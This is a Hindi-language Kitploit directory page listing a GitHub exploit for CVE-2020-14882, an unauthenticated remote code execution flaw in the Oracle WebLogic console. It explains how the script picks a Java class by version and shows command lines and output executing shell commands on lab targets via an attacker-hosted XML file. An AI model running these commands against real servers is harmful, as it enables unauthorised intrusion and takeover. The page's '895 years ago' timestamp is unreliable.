Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-14882 — CVE-2020-14882 | Kitploit
उपकरण/GitHubGitHub/milo2012/cve-2020-14882
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubmilo2012/cve-2020-14882

CVE-2020-14882

CVE-2020-14882

रिपॉजिटरी देखें
895 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-14882

CVE-2020-14882

विवरण

Oracle Fusion Middleware के Oracle WebLogic Server उत्पाद में कमजोरी (घटक: Console)। प्रभावित समर्थित संस्करण 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 और 14.1.1.0.0 हैं। आसानी से शोषण योग्य कमजोरी एक अप्रमाणित हमलावर को HTTP के माध्यम से नेटवर्क पहुंच के साथ Oracle WebLogic Server से समझौता करने की अनुमति देती है। इस कमजोरी के सफल हमले Oracle WebLogic

अंतर

Oracle WebLogic संस्करण 12.2.1 से पहले के लिए, हमें क्लास 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' का उपयोग करना होगा क्योंकि क्लास 'com.tangosol.coherence.mvel2.sh.ShellSession' उपलब्ध नहीं है। स्क्रिप्ट संस्करणों का पता लगाने के आधार पर कमांड निष्पादन के लिए स्वचालित रूप से दो क्लासों के बीच स्विच करती है।

CVE-2020-14882 का शोषण करने के लिए Github पर उपलब्ध कुछ वर्तमान स्क्रिप्ट केवल क्लास 'com.tangosol.coherence.mvel2.sh.ShellSession' का समर्थन करती हैं, जिसका अर्थ है कि ये स्क्रिप्ट WebLogic संस्करण 10.3.6.0.0 और 12.1.3.0.0 पर विफल हो जाएंगी।

चरण

root@kitploit:~
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
root@kitploit:~
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
टूल डाउनलोड करें